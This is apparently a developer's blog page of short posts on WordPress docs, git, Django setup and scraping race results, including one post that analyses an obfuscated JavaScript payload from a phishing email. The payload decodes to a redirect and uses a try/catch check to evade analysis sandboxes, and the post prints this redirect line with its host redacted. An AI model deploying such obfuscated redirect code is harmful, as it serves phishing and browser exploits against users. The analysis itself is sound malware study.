WordPress has great docs

See those nicely ordered links in the sidebar?

“Projects, Mentions, Web Development Tools”

Thank the WordPress documentarians for that. This theme (wp_svbtle) doesn’t sort them by page order (menu_order) by default. You have to add this snippet to its header.php.

$pagesArgs = Array(
    'sort_order' => 'ASC',
    'sort_column' => 'menu_order'
);
$pages = get_pages($pagesArgs);

I know this because the WordPress docs are phenomenal. Check it: http://codex.wordpress.org/Function_Reference/get_pages

This is a blueprint for every software project.

Default Usage
Params (with human-friendly explanations)
Return (way faster than inspecting in a debugger)
Example (contains multiple)
Source File (saves so much time if you want to read the code)
Related (similar functions, great for devs unfamiliar with the library)

Even the page is nicely formatted. WordPress deserves a hand. I know they had 10 years to get it right, but it’s still something to strive for.

Related: My buddy Alban tells of his sordid past with PHP.

Malicious JavaScript snippet

I got this snippet in an HTML file attached to a phishing email.

d=document;a=[0x78,0x63,0x74,0x33,0x7f, etc...];for(i=0;i<a.length;i++){a[i]-=2;}

I’ve reformatted and annotated it for readability.

// hide redirect as ascii bytes
a = [0x78,0x63,0x74,0x33, etc...];

// "decrypt" our malicious code
// maybe this is good enough to defeat filters looking for encoded redirects?
for (i = 0; i < a.length; i++) {
    a[i] -= 2;
}

// detect if we're in a real browser
try {
    // throws exception because you can't increment a node
    document.body++;
} catch(e) {
    // running in a real browser
    notInBrowser = 0;
}

try {
    // this throws an exception if we didn't throw an exception above
    // (notInBrowser was never assigned, so it is undeclared)
    notInBrowser &= 2;
} catch(e) {
    notInBrowser = 1;
}

// if we are in a browser, do the redirect
// remember 0 == false and 1 == true
if (!notInBrowser) {
    // the decoded bytes in a are turned into a string and passed to eval
}

The decrypted code fed to the eval:

if(var1==var2) {document.location="http://[redacted]:8080/forum/links/column.php";}

I’m not sure what was at the URL. It was probably a phishing page or a browser exploit. If anyone can explain why they used a second try-catch instead of an if-statement, let me know.

This guy has a similar post that explains the document.body++.
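To look at a payload like this without running it, the same subtract-2 loop can be replayed outside the browser. A minimal Python sketch: decode is a hypothetical helper, and the sample holds only the four bytes visible in the snippet above, not the full array.

```python
def decode(shifted, offset=2):
    """Undo the 'subtract offset from every byte' obfuscation and return text.

    The result is only returned as a string; nothing is evaluated.
    """
    return "".join(chr(value - offset) for value in shifted)


# Only the bytes shown in the post; the rest of the array was elided.
sample = [0x78, 0x63, 0x74, 0x33]
print(decode(sample))  # prints: var1
```

Printing the decoded string instead of passing it to eval shows the redirect without ever following it.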

Exclude a file from a git commit

I need to do this about once a week.

git update-index --assume-unchanged path/to/file.txt

git commit -a -m "MOBILE-1234: changed a bunch of files but excluded that one I'm saving for later."

git update-index --no-assume-unchanged path/to/file.txt

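If you change 10 files but only want to commit 9, this will do the trick. The first command tells git to treat the file as unchanged, so commit -a skips it, and the last command turns normal change tracking back on.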
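If you do this often, the three commands can be wrapped so the flag is always cleared again, even when the commit fails. A minimal Python sketch, assuming git is on the PATH and the script runs inside the repository; exclusion_commands and commit_excluding are made-up names for illustration.

```python
import subprocess


def exclusion_commands(path, message):
    """Return the three git invocations from the post as argument lists."""
    return [
        ["git", "update-index", "--assume-unchanged", path],
        ["git", "commit", "-a", "-m", message],
        ["git", "update-index", "--no-assume-unchanged", path],
    ]


def commit_excluding(path, message, run=subprocess.check_call):
    """Commit all tracked changes except `path`.

    `run` is injectable so the sequence can be dry-run or tested
    without touching a real repository.
    """
    hide, commit, unhide = exclusion_commands(path, message)
    run(hide)
    try:
        run(commit)
    finally:
        # Always restore tracking, even if the commit itself failed.
        run(unhide)
```

Calling commit_excluding("path/to/file.txt", "MOBILE-1234: ...") runs the same commands in the same order as above; passing run=print gives a dry run.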

TODO: Complete this git tutorial that blew up on HN a while back. http://pcottle.github.com/learnGitBranching/

Run Django from IntelliJ IDEA on OSX with MySQL

If you try to run a Django app from within IntelliJ using MySQL as the storage backend, you might get the following error.

django.core.exceptions.ImproperlyConfigured: Error loading MySQLdb module: dlopen(/Library/Python/2.7/site-packages/MySQL_python-1.2.4b4-py2.7-macosx-10.7-intel.egg/_mysql.so, 2): Library not loaded: libmysqlclient.18.dylib Referenced from: /Library/Python/2.7/site-packages/MySQL_python-1.2.4b4-py2.7-macosx-10.7-intel.egg/_mysql.so
 Reason: image not found

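You’re missing the DYLD_LIBRARY_PATH environment variable.
In IntelliJ, go to “edit configurations” and add it to the run configuration’s environment variables, set to the directory that contains libmysqlclient.18.dylib.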
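Before touching the run configuration, it can help to check what the Python process actually sees. A minimal sketch, assuming the library name from the error above; dirs_with_library is a hypothetical helper, not part of Django or MySQLdb.

```python
import os


def dirs_with_library(lib_name, env=None):
    """List the DYLD_LIBRARY_PATH directories that contain `lib_name`.

    An empty list means the variable is unset or none of its
    directories hold the library.
    """
    env = os.environ if env is None else env
    search_path = env.get("DYLD_LIBRARY_PATH", "")
    return [
        directory
        for directory in search_path.split(os.pathsep)
        if directory and os.path.isfile(os.path.join(directory, lib_name))
    ]


if __name__ == "__main__":
    print(dirs_with_library("libmysqlclient.18.dylib"))
```

Run from the same IntelliJ configuration as the Django app, an empty list suggests the variable never reached the process.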

Cap 10k Race Data

What's the rush?

The Capitol 10,000 is a total friggin’ blast. Anyone with a remote interest in running should participate. Rarely do you get to run up the middle of the Congress bridge straight to the capitol through an unstoppable sea of humanity. On your way to the finish line you’ll pass spectators offering beer, bacon, and donuts.

Before you can catch your breath, they make the results available online. I’ve been looking for an opportunity to jump back into Python, so naturally I scraped the HTML and ran it through a script so people can play with the data.

Here’s how it went down.

Results are posted to mychiptime.com. They have some client-side JavaScript query their backend with your specified parameters. With a little help from Chrome’s developer console, I found their URL scheme. Use wget to download the data. It’s HTML that gets inserted directly into the page with a $("#blah").html(response).

wget "http://www.mychiptime.com/searchResultGen.php?eID=3526&show=all"

The HTML returned by their API is truly hideous. A mere 20k rows cost 16MB… because they’re chock full of <b>, <font>, and “OnMouseOver”. After pulling out the relevant data, the file size is about 800KB.

Here’s the Python script used to generate tab-delimited .csv files from the HTML input. BeautifulSoup can take a few minutes to parse the larger files.

from bs4 import BeautifulSoup

# produce tab-delimited CSV files from large HTML files
for year in range(2008, 2013):
	print('processing ' + str(year))
	infile = str(year) + '.html'
	with open(infile, 'r') as f:
		html = f.read()

	soup = BeautifulSoup(html, 'html.parser')
	table = soup.find('table')

	# all rows; the first one holds the column titles
	rows = table.find_all('tr')

	# write data to csv file
	outfile = str(year) + '.csv'
	with open(outfile, 'w') as out:
		i = 0
		this_row = ''
		for row in rows:
			for col in row.find_all('td'):
				# each value sits inside a <b>; empty cells come out as 'None'
				b = col.find('b')
				this_row += str(b.string) + '\t'

			# flush on even-numbered rows only, so the header stands alone
			# and each following pair of <tr> rows becomes one line
			if i % 2 == 0:
				out.write(this_row + '\n')
				this_row = ''
			i += 1


Playing with the data

Building a simple scatterplot was way harder than it should have been. Google Docs’ spreadsheet crashed when I tried to build a chart. The Python library matplotlib choked on the rows where Age is “None”. Wolfram Alpha rejected it, probably for the same reason. LibreOffice’s Spreadsheet just made my laptop really hot. Octave is inscrutable. But Plot for OSX did the job.

2012 Cap 10k

I’d like to see someone with MATLAB skills come up with some more advanced plots or divine some insight from the data. The columns available for 2012 are:

  • Name
  • Division Place
  • Gun Time
  • Chip Time
  • Overall Place
  • Age
  • Zip
  • Gen Place
  • Total Pace
  • Total Div
  • Total Gend
  • Tot AG
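One way around the “None” ages that tripped up matplotlib is to drop those rows before plotting. A rough Python sketch, assuming the header row uses the column names listed above (Age, Chip Time) and that times look like H:MM:SS or MM:SS. Both are assumptions about the files, and parse_time and age_vs_time are hypothetical helpers.

```python
import csv


def parse_time(text):
    """Convert 'H:MM:SS' or 'MM:SS' to seconds; return None if unparseable."""
    try:
        parts = [float(part) for part in text.strip().split(":")]
    except ValueError:
        return None
    seconds = 0.0
    for part in parts:
        seconds = seconds * 60 + part
    return seconds


def age_vs_time(lines, age_col="Age", time_col="Chip Time"):
    """Yield (age, seconds) pairs, skipping rows with a missing age or time."""
    reader = csv.DictReader(lines, delimiter="\t")
    for row in reader:
        age = (row.get(age_col) or "").strip()
        seconds = parse_time(row.get(time_col) or "")
        if not age.isdigit() or seconds is None:
            continue  # e.g. Age is "None"
        yield int(age), seconds
```

Something like age_vs_time(open("2012.csv")) then yields clean numeric pairs that can be unzipped into x and y lists for a scatterplot.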

Here’s a zip archive of all the tab delimited CSV files 2008-2012.